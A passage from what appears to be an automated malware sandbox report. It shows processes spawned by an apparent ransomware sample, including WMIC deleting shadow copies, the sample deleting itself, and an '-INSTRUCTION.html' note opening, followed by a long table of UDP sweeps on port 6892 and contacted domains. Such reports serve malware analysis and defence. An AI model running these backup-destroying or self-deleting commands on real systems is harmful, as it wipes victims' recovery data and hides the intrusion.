"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2688 CREDAT:275457 /prefetch:2
C:\Windows\System32\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\MBHVRM~1.EXE
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\-INSTRUCTION.html
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys3A62.tmp"
Network
| Country | Destination | Domain | Proto |
| US | 15.49.2.0:6892 | udp | |
| US | 15.49.2.1:6892 | udp | |
| US | 15.49.2.2:6892 | udp | |
| US | 15.49.2.3:6892 | udp | |
| US | 15.49.2.4:6892 | udp | |
| US | 15.49.2.5:6892 | udp | |
| US | 15.49.2.6:6892 | udp | |
| US | 15.49.2.7:6892 | udp | |
| US | 15.49.2.8:6892 | udp | |
| US | 15.49.2.9:6892 | udp | |
| US | 15.49.2.10:6892 | udp | |
| US | 15.49.2.11:6892 | udp | |
| US | 15.49.2.12:6892 | udp | |
| US | 15.49.2.13:6892 | udp | |
| US | 15.49.2.14:6892 | udp | |
| US | 15.49.2.15:6892 | udp | |
| US | 15.49.2.16:6892 | udp | |
| US | 15.49.2.17:6892 | udp | |
| US | 15.49.2.18:6892 | udp | |
| US | 15.49.2.19:6892 | udp | |
| US | 15.49.2.20:6892 | udp | |
| US | 15.49.2.21:6892 | udp | |
| US | 15.49.2.22:6892 | udp | |
| US | 15.49.2.23:6892 | udp | |
| US | 15.49.2.24:6892 | udp | |
| US | 15.49.2.25:6892 | udp | |
| US | 15.49.2.26:6892 | udp | |
| US | 15.49.2.27:6892 | udp | |
| US | 15.49.2.28:6892 | udp | |
| US | 15.49.2.29:6892 | udp | |
| US | 15.49.2.30:6892 | udp | |
| US | 15.49.2.31:6892 | udp | |
| JP | 122.1.13.0:6892 | udp | |
| JP | 122.1.13.1:6892 | udp | |
| JP | 122.1.13.2:6892 | udp | |
| JP | 122.1.13.3:6892 | udp | |
| JP | 122.1.13.4:6892 | udp | |
| JP | 122.1.13.5:6892 | udp | |
| JP | 122.1.13.6:6892 | udp | |
| JP | 122.1.13.7:6892 | udp | |
| JP | 122.1.13.8:6892 | udp | |
| JP | 122.1.13.9:6892 | udp | |
| JP | 122.1.13.10:6892 | udp | |
| JP | 122.1.13.11:6892 | udp | |
| JP | 122.1.13.12:6892 | udp | |
| JP | 122.1.13.13:6892 | udp | |
| JP | 122.1.13.14:6892 | udp | |
| JP | 122.1.13.15:6892 | udp | |
| JP | 122.1.13.16:6892 | udp | |
| JP | 122.1.13.17:6892 | udp | |
| JP | 122.1.13.18:6892 | udp | |
| JP | 122.1.13.19:6892 | udp | |
| JP | 122.1.13.20:6892 | udp | |
| JP | 122.1.13.21:6892 | udp | |
| JP | 122.1.13.22:6892 | udp | |
| JP | 122.1.13.23:6892 | udp | |
| JP | 122.1.13.24:6892 | udp | |
| JP | 122.1.13.25:6892 | udp | |
| JP | 122.1.13.26:6892 | udp | |
| JP | 122.1.13.27:6892 | udp | |
| JP | 122.1.13.28:6892 | udp | |
| JP | 122.1.13.29:6892 | udp | |
| JP | 122.1.13.30:6892 | udp | |
| JP | 122.1.13.31:6892 | udp | |
| LT | 194.165.16.0:6892 | udp | |
| LT | 194.165.16.1:6892 | udp | |
| LT | 194.165.16.2:6892 | udp | |
| LT | 194.165.16.3:6892 | udp | |
| LT | 194.165.16.4:6892 | udp | |
| LT | 194.165.16.5:6892 | udp | |
| LT | 194.165.16.6:6892 | udp | |
| LT | 194.165.16.7:6892 | udp | |
| LT | 194.165.16.8:6892 | udp | |
| LT | 194.165.16.9:6892 | udp | |
| LT | 194.165.16.10:6892 | udp | |
| LT | 194.165.16.11:6892 | udp | |
| LT | 194.165.16.12:6892 | udp | |
| LT | 194.165.16.13:6892 | udp | |
| LT | 194.165.16.14:6892 | udp | |
| LT | 194.165.16.15:6892 | udp | |
| LT | 194.165.16.16:6892 | udp | |
| LT | 194.165.16.17:6892 | udp | |
| LT | 194.165.16.18:6892 | udp | |
| LT | 194.165.16.19:6892 | udp | |
| LT | 194.165.16.20:6892 | udp | |
| LT | 194.165.16.21:6892 | udp | |
| LT | 194.165.16.22:6892 | udp | |
| LT | 194.165.16.23:6892 | udp | |
| LT | 194.165.16.24:6892 | udp | |
| LT | 194.165.16.25:6892 | udp | |
| LT | 194.165.16.26:6892 | udp | |
| LT | 194.165.16.27:6892 | udp | |
| LT | 194.165.16.28:6892 | udp | |
| LT | 194.165.16.29:6892 | udp | |
| LT | 194.165.16.30:6892 | udp | |
| LT | 194.165.16.31:6892 | udp | |
| LT | 194.165.16.32:6892 | udp | |
| LT | 194.165.16.33:6892 | udp | |
| LT | 194.165.16.34:6892 | udp | |
| LT | 194.165.16.35:6892 | udp | |
| LT | 194.165.16.36:6892 | udp | |
| LT | 194.165.16.37:6892 | udp | |
| LT | 194.165.16.38:6892 | udp | |
| LT | 194.165.16.39:6892 | udp | |
| LT | 194.165.16.40:6892 | udp | |
| LT | 194.165.16.41:6892 | udp | |
| LT | 194.165.16.42:6892 | udp | |
| LT | 194.165.16.43:6892 | udp | |
| LT | 194.165.16.44:6892 | udp | |
| LT | 194.165.16.45:6892 | udp | |
| LT | 194.165.16.46:6892 | udp | |
| LT | 194.165.16.47:6892 | udp | |
| LT | 194.165.16.48:6892 | udp | |
| LT | 194.165.16.49:6892 | udp | |
| LT | 194.165.16.50:6892 | udp | |
| LT | 194.165.16.51:6892 | udp | |
| LT | 194.165.16.52:6892 | udp | |
| LT | 194.165.16.53:6892 | udp | |
| LT | 194.165.16.54:6892 | udp | |
| LT | 194.165.16.55:6892 | udp | |
| LT | 194.165.16.56:6892 | udp | |
| LT | 194.165.16.57:6892 | udp | |
| LT | 194.165.16.58:6892 | udp | |
| LT | 194.165.16.59:6892 | udp | |
| LT | 194.165.16.60:6892 | udp | |
| LT | 194.165.16.61:6892 | udp | |
| LT | 194.165.16.62:6892 | udp | |
| LT | 194.165.16.63:6892 | udp | |
| LT | 194.165.16.64:6892 | udp | |
| LT | 194.165.16.65:6892 | udp | |
| LT | 194.165.16.66:6892 | udp | |
| LT | 194.165.16.67:6892 | udp | |
| LT | 194.165.16.68:6892 | udp | |
| LT | 194.165.16.69:6892 | udp | |
| LT | 194.165.16.70:6892 | udp | |
| LT | 194.165.16.71:6892 | udp | |
| LT | 194.165.16.72:6892 | udp | |
| LT | 194.165.16.73:6892 | udp | |
| LT | 194.165.16.74:6892 | udp | |
| LT | 194.165.16.75:6892 | udp | |
| LT | 194.165.16.76:6892 | udp | |
| LT | 194.165.16.77:6892 | udp | |
| LT | 194.165.16.78:6892 | udp | |
| LT | 194.165.16.79:6892 | udp | |
| LT | 194.165.16.80:6892 | udp | |
| LT | 194.165.16.81:6892 | udp | |
| LT | 194.165.16.82:6892 | udp | |
| LT | 194.165.16.83:6892 | udp | |
| LT | 194.165.16.84:6892 | udp | |
| LT | 194.165.16.85:6892 | udp | |
| LT | 194.165.16.86:6892 | udp | |
| LT | 194.165.16.87:6892 | udp | |
| LT | 194.165.16.88:6892 | udp | |
| LT | 194.165.16.89:6892 | udp | |
| LT | 194.165.16.90:6892 | udp | |
| LT | 194.165.16.91:6892 | udp | |
| LT | 194.165.16.92:6892 | udp | |
| LT | 194.165.16.93:6892 | udp | |
| LT | 194.165.16.94:6892 | udp | |
| LT | 194.165.16.95:6892 | udp | |
| LT | 194.165.16.96:6892 | udp | |
| LT | 194.165.16.97:6892 | udp | |
| LT | 194.165.16.98:6892 | udp | |
| LT | 194.165.16.99:6892 | udp | |
| LT | 194.165.16.100:6892 | udp | |
| LT | 194.165.16.101:6892 | udp | |
| LT | 194.165.16.102:6892 | udp | |
| LT | 194.165.16.103:6892 | udp | |
| LT | 194.165.16.104:6892 | udp | |
| LT | 194.165.16.105:6892 | udp | |
| LT | 194.165.16.106:6892 | udp | |
| LT | 194.165.16.107:6892 | udp | |
| LT | 194.165.16.108:6892 | udp | |
| LT | 194.165.16.109:6892 | udp | |
| LT | 194.165.16.110:6892 | udp | |
| LT | 194.165.16.111:6892 | udp | |
| LT | 194.165.16.112:6892 | udp | |
| LT | 194.165.16.113:6892 | udp | |
| LT | 194.165.16.114:6892 | udp | |
| LT | 194.165.16.115:6892 | udp | |
| LT | 194.165.16.116:6892 | udp | |
| LT | 194.165.16.117:6892 | udp | |
| LT | 194.165.16.118:6892 | udp | |
| LT | 194.165.16.119:6892 | udp | |
| LT | 194.165.16.120:6892 | udp | |
| LT | 194.165.16.121:6892 | udp | |
| LT | 194.165.16.122:6892 | udp | |
| LT | 194.165.16.123:6892 | udp | |
| LT | 194.165.16.124:6892 | udp | |
| LT | 194.165.16.125:6892 | udp | |
| LT | 194.165.16.126:6892 | udp | |
| LT | 194.165.16.127:6892 | udp | |
| LT | 194.165.16.128:6892 | udp | |
| LT | 194.165.16.129:6892 | udp | |
| LT | 194.165.16.130:6892 | udp | |
| LT | 194.165.16.131:6892 | udp | |
| LT | 194.165.16.132:6892 | udp | |
| LT | 194.165.16.133:6892 | udp | |
| LT | 194.165.16.134:6892 | udp | |
| LT | 194.165.16.135:6892 | udp | |
| LT | 194.165.16.136:6892 | udp | |
| LT | 194.165.16.137:6892 | udp | |
| LT | 194.165.16.138:6892 | udp | |
| LT | 194.165.16.139:6892 | udp | |
| LT | 194.165.16.140:6892 | udp | |
| LT | 194.165.16.141:6892 | udp | |
| LT | 194.165.16.142:6892 | udp | |
| LT | 194.165.16.143:6892 | udp | |
| LT | 194.165.16.144:6892 | udp | |
| LT | 194.165.16.145:6892 | udp | |
| LT | 194.165.16.146:6892 | udp | |
| LT | 194.165.16.147:6892 | udp | |
| LT | 194.165.16.148:6892 | udp | |
| LT | 194.165.16.149:6892 | udp | |
| LT | 194.165.16.150:6892 | udp | |
| LT | 194.165.16.151:6892 | udp | |
| LT | 194.165.16.152:6892 | udp | |
| LT | 194.165.16.153:6892 | udp | |
| LT | 194.165.16.154:6892 | udp | |
| LT | 194.165.16.155:6892 | udp | |
| LT | 194.165.16.156:6892 | udp | |
| LT | 194.165.16.157:6892 | udp | |
| LT | 194.165.16.158:6892 | udp | |
| LT | 194.165.16.159:6892 | udp | |
| LT | 194.165.16.160:6892 | udp | |
| LT | 194.165.16.161:6892 | udp | |
| LT | 194.165.16.162:6892 | udp | |
| LT | 194.165.16.163:6892 | udp | |
| LT | 194.165.16.164:6892 | udp | |
| LT | 194.165.16.165:6892 | udp | |
| LT | 194.165.16.166:6892 | udp | |
| LT | 194.165.16.167:6892 | udp | |
| LT | 194.165.16.168:6892 | udp | |
| LT | 194.165.16.169:6892 | udp | |
| LT | 194.165.16.170:6892 | udp | |
| LT | 194.165.16.171:6892 | udp | |
| LT | 194.165.16.172:6892 | udp | |
| LT | 194.165.16.173:6892 | udp | |
| LT | 194.165.16.174:6892 | udp | |
| LT | 194.165.16.175:6892 | udp | |
| LT | 194.165.16.176:6892 | udp | |
| LT | 194.165.16.177:6892 | udp | |
| LT | 194.165.16.178:6892 | udp | |
| LT | 194.165.16.179:6892 | udp | |
| LT | 194.165.16.180:6892 | udp | |
| LT | 194.165.16.181:6892 | udp | |
| LT | 194.165.16.182:6892 | udp | |
| LT | 194.165.16.183:6892 | udp | |
| LT | 194.165.16.184:6892 | udp | |
| LT | 194.165.16.185:6892 | udp | |
| LT | 194.165.16.186:6892 | udp | |
| LT | 194.165.16.187:6892 | udp | |
| LT | 194.165.16.188:6892 | udp | |
| LT | 194.165.16.189:6892 | udp | |
| LT | 194.165.16.190:6892 | udp | |
| LT | 194.165.16.191:6892 | udp | |
| LT | 194.165.16.192:6892 | udp | |
| LT | 194.165.16.193:6892 | udp | |
| LT | 194.165.16.194:6892 | udp | |
| LT | 194.165.16.195:6892 | udp | |
| LT | 194.165.16.196:6892 | udp | |
| LT | 194.165.16.197:6892 | udp | |
| LT | 194.165.16.198:6892 | udp | |
| LT | 194.165.16.199:6892 | udp | |
| LT | 194.165.16.200:6892 | udp | |
| LT | 194.165.16.201:6892 | udp | |
| LT | 194.165.16.202:6892 | udp | |
| LT | 194.165.16.203:6892 | udp | |
| LT | 194.165.16.204:6892 | udp | |
| LT | 194.165.16.205:6892 | udp | |
| LT | 194.165.16.206:6892 | udp | |
| LT | 194.165.16.207:6892 | udp | |
| LT | 194.165.16.208:6892 | udp | |
| LT | 194.165.16.209:6892 | udp | |
| LT | 194.165.16.210:6892 | udp | |
| LT | 194.165.16.211:6892 | udp | |
| LT | 194.165.16.212:6892 | udp | |
| LT | 194.165.16.213:6892 | udp | |
| LT | 194.165.16.214:6892 | udp | |
| LT | 194.165.16.215:6892 | udp | |
| LT | 194.165.16.216:6892 | udp | |
| LT | 194.165.16.217:6892 | udp | |
| LT | 194.165.16.218:6892 | udp | |
| LT | 194.165.16.219:6892 | udp | |
| LT | 194.165.16.220:6892 | udp | |
| LT | 194.165.16.221:6892 | udp | |
| LT | 194.165.16.222:6892 | udp | |
| LT | 194.165.16.223:6892 | udp | |
| LT | 194.165.16.224:6892 | udp | |
| LT | 194.165.16.225:6892 | udp | |
| LT | 194.165.16.226:6892 | udp | |
| LT | 194.165.16.227:6892 | udp | |
| LT | 194.165.16.228:6892 | udp | |
| LT | 194.165.16.229:6892 | udp | |
| LT | 194.165.16.230:6892 | udp | |
| LT | 194.165.16.231:6892 | udp | |
| LT | 194.165.16.232:6892 | udp | |
| LT | 194.165.16.233:6892 | udp | |
| LT | 194.165.16.234:6892 | udp | |
| LT | 194.165.16.235:6892 | udp | |
| LT | 194.165.16.236:6892 | udp | |
| LT | 194.165.16.237:6892 | udp | |
| LT | 194.165.16.238:6892 | udp | |
| LT | 194.165.16.239:6892 | udp | |
| LT | 194.165.16.240:6892 | udp | |
| LT | 194.165.16.241:6892 | udp | |
| LT | 194.165.16.242:6892 | udp | |
| LT | 194.165.16.243:6892 | udp | |
| LT | 194.165.16.244:6892 | udp | |
| LT | 194.165.16.245:6892 | udp | |
| LT | 194.165.16.246:6892 | udp | |
| LT | 194.165.16.247:6892 | udp | |
| LT | 194.165.16.248:6892 | udp | |
| LT | 194.165.16.249:6892 | udp | |
| LT | 194.165.16.250:6892 | udp | |
| LT | 194.165.16.251:6892 | udp | |
| LT | 194.165.16.252:6892 | udp | |
| LT | 194.165.16.253:6892 | udp | |
| LT | 194.165.16.254:6892 | udp | |
| LT | 194.165.16.255:6892 | udp | |
| LT | 194.165.17.0:6892 | udp | |
| LT | 194.165.17.1:6892 | udp | |
| LT | 194.165.17.2:6892 | udp | |
| LT | 194.165.17.3:6892 | udp | |
| LT | 194.165.17.4:6892 | udp | |
| LT | 194.165.17.5:6892 | udp | |
| LT | 194.165.17.6:6892 | udp | |
| LT | 194.165.17.7:6892 | udp | |
| LT | 194.165.17.8:6892 | udp | |
| LT | 194.165.17.9:6892 | udp | |
| LT | 194.165.17.10:6892 | udp | |
| LT | 194.165.17.11:6892 | udp | |
| LT | 194.165.17.12:6892 | udp | |
| LT | 194.165.17.13:6892 | udp | |
| LT | 194.165.17.14:6892 | udp | |
| LT | 194.165.17.15:6892 | udp | |
| LT | 194.165.17.16:6892 | udp | |
| LT | 194.165.17.17:6892 | udp | |
| LT | 194.165.17.18:6892 | udp | |
| LT | 194.165.17.19:6892 | udp | |
| LT | 194.165.17.20:6892 | udp | |
| LT | 194.165.17.21:6892 | udp | |
| LT | 194.165.17.22:6892 | udp | |
| LT | 194.165.17.23:6892 | udp | |
| LT | 194.165.17.24:6892 | udp | |
| LT | 194.165.17.25:6892 | udp | |
| LT | 194.165.17.26:6892 | udp | |
| LT | 194.165.17.27:6892 | udp | |
| LT | 194.165.17.28:6892 | udp | |
| LT | 194.165.17.29:6892 | udp | |
| LT | 194.165.17.30:6892 | udp | |
| LT | 194.165.17.31:6892 | udp | |
| LT | 194.165.17.32:6892 | udp | |
| LT | 194.165.17.33:6892 | udp | |
| LT | 194.165.17.34:6892 | udp | |
| LT | 194.165.17.35:6892 | udp | |
| LT | 194.165.17.36:6892 | udp | |
| LT | 194.165.17.37:6892 | udp | |
| LT | 194.165.17.38:6892 | udp | |
| LT | 194.165.17.39:6892 | udp | |
| LT | 194.165.17.40:6892 | udp | |
| LT | 194.165.17.41:6892 | udp | |
| LT | 194.165.17.42:6892 | udp | |
| LT | 194.165.17.43:6892 | udp | |
| LT | 194.165.17.44:6892 | udp | |
| LT | 194.165.17.45:6892 | udp | |
| LT | 194.165.17.46:6892 | udp | |
| LT | 194.165.17.47:6892 | udp | |
| LT | 194.165.17.48:6892 | udp | |
| LT | 194.165.17.49:6892 | udp | |
| LT | 194.165.17.50:6892 | udp | |
| LT | 194.165.17.51:6892 | udp | |
| LT | 194.165.17.52:6892 | udp | |
| LT | 194.165.17.53:6892 | udp | |
| LT | 194.165.17.54:6892 | udp | |
| LT | 194.165.17.55:6892 | udp | |
| LT | 194.165.17.56:6892 | udp | |
| LT | 194.165.17.57:6892 | udp | |
| LT | 194.165.17.58:6892 | udp | |
| LT | 194.165.17.59:6892 | udp | |
| LT | 194.165.17.60:6892 | udp | |
| LT | 194.165.17.61:6892 | udp | |
| LT | 194.165.17.62:6892 | udp | |
| LT | 194.165.17.63:6892 | udp | |
| LT | 194.165.17.64:6892 | udp | |
| LT | 194.165.17.65:6892 | udp | |
| LT | 194.165.17.66:6892 | udp | |
| LT | 194.165.17.67:6892 | udp | |
| LT | 194.165.17.68:6892 | udp | |
| LT | 194.165.17.69:6892 | udp | |
| LT | 194.165.17.70:6892 | udp | |
| LT | 194.165.17.71:6892 | udp | |
| LT | 194.165.17.72:6892 | udp | |
| LT | 194.165.17.73:6892 | udp | |
| LT | 194.165.17.74:6892 | udp | |
| LT | 194.165.17.75:6892 | udp | |
| LT | 194.165.17.76:6892 | udp | |
| LT | 194.165.17.77:6892 | udp | |
| LT | 194.165.17.78:6892 | udp | |
| LT | 194.165.17.79:6892 | udp | |
| LT | 194.165.17.80:6892 | udp | |
| LT | 194.165.17.81:6892 | udp | |
| LT | 194.165.17.82:6892 | udp | |
| LT | 194.165.17.83:6892 | udp | |
| LT | 194.165.17.84:6892 | udp | |
| LT | 194.165.17.85:6892 | udp | |
| LT | 194.165.17.86:6892 | udp | |
| LT | 194.165.17.87:6892 | udp | |
| LT | 194.165.17.88:6892 | udp | |
| LT | 194.165.17.89:6892 | udp | |
| LT | 194.165.17.90:6892 | udp | |
| LT | 194.165.17.91:6892 | udp | |
| LT | 194.165.17.92:6892 | udp | |
| LT | 194.165.17.93:6892 | udp | |
| LT | 194.165.17.94:6892 | udp | |
| LT | 194.165.17.95:6892 | udp | |
| LT | 194.165.17.96:6892 | udp | |
| LT | 194.165.17.97:6892 | udp | |
| LT | 194.165.17.98:6892 | udp | |
| LT | 194.165.17.99:6892 | udp | |
| LT | 194.165.17.100:6892 | udp | |
| LT | 194.165.17.101:6892 | udp | |
| LT | 194.165.17.102:6892 | udp | |
| LT | 194.165.17.103:6892 | udp | |
| LT | 194.165.17.104:6892 | udp | |
| LT | 194.165.17.105:6892 | udp | |
| LT | 194.165.17.106:6892 | udp | |
| LT | 194.165.17.107:6892 | udp | |
| LT | 194.165.17.108:6892 | udp | |
| LT | 194.165.17.109:6892 | udp | |
| LT | 194.165.17.110:6892 | udp | |
| LT | 194.165.17.111:6892 | udp | |
| LT | 194.165.17.112:6892 | udp | |
| LT | 194.165.17.113:6892 | udp | |
| LT | 194.165.17.114:6892 | udp | |
| LT | 194.165.17.115:6892 | udp | |
| LT | 194.165.17.116:6892 | udp | |
| LT | 194.165.17.117:6892 | udp | |
| LT | 194.165.17.118:6892 | udp | |
| LT | 194.165.17.119:6892 | udp | |
| LT | 194.165.17.120:6892 | udp | |
| LT | 194.165.17.121:6892 | udp | |
| LT | 194.165.17.122:6892 | udp | |
| LT | 194.165.17.123:6892 | udp | |
| LT | 194.165.17.124:6892 | udp | |
| LT | 194.165.17.125:6892 | udp | |
| LT | 194.165.17.126:6892 | udp | |
| LT | 194.165.17.127:6892 | udp | |
| LT | 194.165.17.128:6892 | udp | |
| LT | 194.165.17.129:6892 | udp | |
| LT | 194.165.17.130:6892 | udp | |
| LT | 194.165.17.131:6892 | udp | |
| LT | 194.165.17.132:6892 | udp | |
| LT | 194.165.17.133:6892 | udp | |
| LT | 194.165.17.134:6892 | udp | |
| LT | 194.165.17.135:6892 | udp | |
| LT | 194.165.17.136:6892 | udp | |
| LT | 194.165.17.137:6892 | udp | |
| LT | 194.165.17.138:6892 | udp | |
| LT | 194.165.17.139:6892 | udp | |
| LT | 194.165.17.140:6892 | udp | |
| LT | 194.165.17.141:6892 | udp | |
| LT | 194.165.17.142:6892 | udp | |
| LT | 194.165.17.143:6892 | udp | |
| LT | 194.165.17.144:6892 | udp | |
| LT | 194.165.17.145:6892 | udp | |
| LT | 194.165.17.146:6892 | udp | |
| LT | 194.165.17.147:6892 | udp | |
| LT | 194.165.17.148:6892 | udp | |
| LT | 194.165.17.149:6892 | udp | |
| LT | 194.165.17.150:6892 | udp | |
| LT | 194.165.17.151:6892 | udp | |
| LT | 194.165.17.152:6892 | udp | |
| LT | 194.165.17.153:6892 | udp | |
| LT | 194.165.17.154:6892 | udp | |
| LT | 194.165.17.155:6892 | udp | |
| LT | 194.165.17.156:6892 | udp | |
| LT | 194.165.17.157:6892 | udp | |
| LT | 194.165.17.158:6892 | udp | |
| LT | 194.165.17.159:6892 | udp | |
| LT | 194.165.17.160:6892 | udp | |
| LT | 194.165.17.161:6892 | udp | |
| LT | 194.165.17.162:6892 | udp | |
| LT | 194.165.17.163:6892 | udp | |
| LT | 194.165.17.164:6892 | udp | |
| LT | 194.165.17.165:6892 | udp | |
| LT | 194.165.17.166:6892 | udp | |
| LT | 194.165.17.167:6892 | udp | |
| LT | 194.165.17.168:6892 | udp | |
| LT | 194.165.17.169:6892 | udp | |
| LT | 194.165.17.170:6892 | udp | |
| LT | 194.165.17.171:6892 | udp | |
| LT | 194.165.17.172:6892 | udp | |
| LT | 194.165.17.173:6892 | udp | |
| LT | 194.165.17.174:6892 | udp | |
| LT | 194.165.17.175:6892 | udp | |
| LT | 194.165.17.176:6892 | udp | |
| LT | 194.165.17.177:6892 | udp | |
| LT | 194.165.17.178:6892 | udp | |
| LT | 194.165.17.179:6892 | udp | |
| LT | 194.165.17.180:6892 | udp | |
| LT | 194.165.17.181:6892 | udp | |
| LT | 194.165.17.182:6892 | udp | |
| LT | 194.165.17.183:6892 | udp | |
| LT | 194.165.17.184:6892 | udp | |
| LT | 194.165.17.185:6892 | udp | |
| LT | 194.165.17.186:6892 | udp | |
| LT | 194.165.17.187:6892 | udp | |
| LT | 194.165.17.188:6892 | udp | |
| LT | 194.165.17.189:6892 | udp | |
| LT | 194.165.17.190:6892 | udp | |
| LT | 194.165.17.191:6892 | udp | |
| LT | 194.165.17.192:6892 | udp | |
| LT | 194.165.17.193:6892 | udp | |
| LT | 194.165.17.194:6892 | udp | |
| LT | 194.165.17.195:6892 | udp | |
| LT | 194.165.17.196:6892 | udp | |
| LT | 194.165.17.197:6892 | udp | |
| LT | 194.165.17.198:6892 | udp | |
| LT | 194.165.17.199:6892 | udp | |
| LT | 194.165.17.200:6892 | udp | |
| LT | 194.165.17.201:6892 | udp | |
| LT | 194.165.17.202:6892 | udp | |
| LT | 194.165.17.203:6892 | udp | |
| LT | 194.165.17.204:6892 | udp | |
| LT | 194.165.17.205:6892 | udp | |
| LT | 194.165.17.206:6892 | udp | |
| LT | 194.165.17.207:6892 | udp | |
| LT | 194.165.17.208:6892 | udp | |
| LT | 194.165.17.209:6892 | udp | |
| LT | 194.165.17.210:6892 | udp | |
| LT | 194.165.17.211:6892 | udp | |
| LT | 194.165.17.212:6892 | udp | |
| LT | 194.165.17.213:6892 | udp | |
| LT | 194.165.17.214:6892 | udp | |
| LT | 194.165.17.215:6892 | udp | |
| LT | 194.165.17.216:6892 | udp | |
| LT | 194.165.17.217:6892 | udp | |
| LT | 194.165.17.218:6892 | udp | |
| LT | 194.165.17.219:6892 | udp | |
| LT | 194.165.17.220:6892 | udp | |
| LT | 194.165.17.221:6892 | udp | |
| LT | 194.165.17.222:6892 | udp | |
| LT | 194.165.17.223:6892 | udp | |
| LT | 194.165.17.224:6892 | udp | |
| LT | 194.165.17.225:6892 | udp | |
| LT | 194.165.17.226:6892 | udp | |
| LT | 194.165.17.227:6892 | udp | |
| LT | 194.165.17.228:6892 | udp | |
| LT | 194.165.17.229:6892 | udp | |
| LT | 194.165.17.230:6892 | udp | |
| LT | 194.165.17.231:6892 | udp | |
| LT | 194.165.17.232:6892 | udp | |
| LT | 194.165.17.233:6892 | udp | |
| LT | 194.165.17.234:6892 | udp | |
| LT | 194.165.17.235:6892 | udp | |
| LT | 194.165.17.236:6892 | udp | |
| LT | 194.165.17.237:6892 | udp | |
| LT | 194.165.17.238:6892 | udp | |
| LT | 194.165.17.239:6892 | udp | |
| LT | 194.165.17.240:6892 | udp | |
| LT | 194.165.17.241:6892 | udp | |
| LT | 194.165.17.242:6892 | udp | |
| LT | 194.165.17.243:6892 | udp | |
| LT | 194.165.17.244:6892 | udp | |
| LT | 194.165.17.245:6892 | udp | |
| LT | 194.165.17.246:6892 | udp | |
| LT | 194.165.17.247:6892 | udp | |
| LT | 194.165.17.248:6892 | udp | |
| LT | 194.165.17.249:6892 | udp | |
| LT | 194.165.17.250:6892 | udp | |
| LT | 194.165.17.251:6892 | udp | |
| LT | 194.165.17.252:6892 | udp | |
| LT | 194.165.17.253:6892 | udp | |
| LT | 194.165.17.254:6892 | udp | |
| US | 128.31.0.39:9101 | tcp | |
| N/A | 127.0.0.1:49375 | tcp | |
| LT | 194.165.17.255:6892 | udp | |
| SG | 76.73.17.194:9090 | tcp | |
| US | 8.8.8.8:53 | unstiff.pw | udp |
| US | 8.8.8.8:53 | collabvm.xyz | udp |
| RU | 95.213.195.123:80 | tcp | |
| US | 15.49.2.0:6892 | udp | |
| US | 15.49.2.1:6892 | udp | |
| US | 15.49.2.2:6892 | udp | |
| US | 15.49.2.3:6892 | udp | |
| US | 15.49.2.4:6892 | udp | |
| US | 15.49.2.5:6892 | udp | |
| US | 15.49.2.6:6892 | udp | |
| US | 15.49.2.7:6892 | udp | |
| US | 15.49.2.8:6892 | udp | |
| US | 15.49.2.9:6892 | udp | |
| US | 15.49.2.10:6892 | udp | |
| US | 15.49.2.11:6892 | udp | |
| US | 15.49.2.12:6892 | udp | |
| US | 15.49.2.13:6892 | udp | |
| US | 15.49.2.14:6892 | udp | |
| US | 15.49.2.15:6892 | udp | |
| US | 15.49.2.16:6892 | udp | |
| US | 15.49.2.17:6892 | udp | |
| US | 15.49.2.18:6892 | udp | |
| US | 15.49.2.19:6892 | udp | |
| US | 15.49.2.20:6892 | udp | |
| US | 15.49.2.21:6892 | udp | |
| US | 15.49.2.22:6892 | udp | |
| US | 15.49.2.23:6892 | udp | |
| US | 15.49.2.24:6892 | udp | |
| US | 15.49.2.25:6892 | udp | |
| US | 15.49.2.26:6892 | udp | |
| US | 15.49.2.27:6892 | udp | |
| US | 15.49.2.28:6892 | udp | |
| US | 15.49.2.29:6892 | udp | |
| US | 15.49.2.30:6892 | udp | |
| US | 15.49.2.31:6892 | udp | |
| JP | 122.1.13.0:6892 | udp | |
| JP | 122.1.13.1:6892 | udp | |
| JP | 122.1.13.2:6892 | udp | |
| JP | 122.1.13.3:6892 | udp | |
| JP | 122.1.13.4:6892 | udp | |
| JP | 122.1.13.5:6892 | udp | |
| JP | 122.1.13.6:6892 | udp | |
| JP | 122.1.13.7:6892 | udp | |
| JP | 122.1.13.8:6892 | udp | |
| JP | 122.1.13.9:6892 | udp | |
| JP | 122.1.13.10:6892 | udp | |
| JP | 122.1.13.11:6892 | udp | |
| JP | 122.1.13.12:6892 | udp | |
| JP | 122.1.13.13:6892 | udp | |
| JP | 122.1.13.14:6892 | udp | |
| JP | 122.1.13.15:6892 | udp | |
| JP | 122.1.13.16:6892 | udp | |
| JP | 122.1.13.17:6892 | udp | |
| JP | 122.1.13.18:6892 | udp | |
| JP | 122.1.13.19:6892 | udp | |
| JP | 122.1.13.20:6892 | udp | |
| JP | 122.1.13.21:6892 | udp | |
| JP | 122.1.13.22:6892 | udp | |
| JP | 122.1.13.23:6892 | udp | |
| JP | 122.1.13.24:6892 | udp | |
| JP | 122.1.13.25:6892 | udp | |
| JP | 122.1.13.26:6892 | udp | |
| JP | 122.1.13.27:6892 | udp | |
| JP | 122.1.13.28:6892 | udp | |
| JP | 122.1.13.29:6892 | udp | |
| JP | 122.1.13.30:6892 | udp | |
| JP | 122.1.13.31:6892 | udp | |
| LT | 194.165.16.0:6892 | udp | |
| LT | 194.165.16.1:6892 | udp | |
| LT | 194.165.16.2:6892 | udp | |
| LT | 194.165.16.3:6892 | udp | |
| LT | 194.165.16.4:6892 | udp | |
| LT | 194.165.16.5:6892 | udp | |
| LT | 194.165.16.6:6892 | udp | |
| LT | 194.165.16.7:6892 | udp | |
| LT | 194.165.16.8:6892 | udp | |
| LT | 194.165.16.9:6892 | udp | |
| LT | 194.165.16.10:6892 | udp | |
| LT | 194.165.16.11:6892 | udp | |
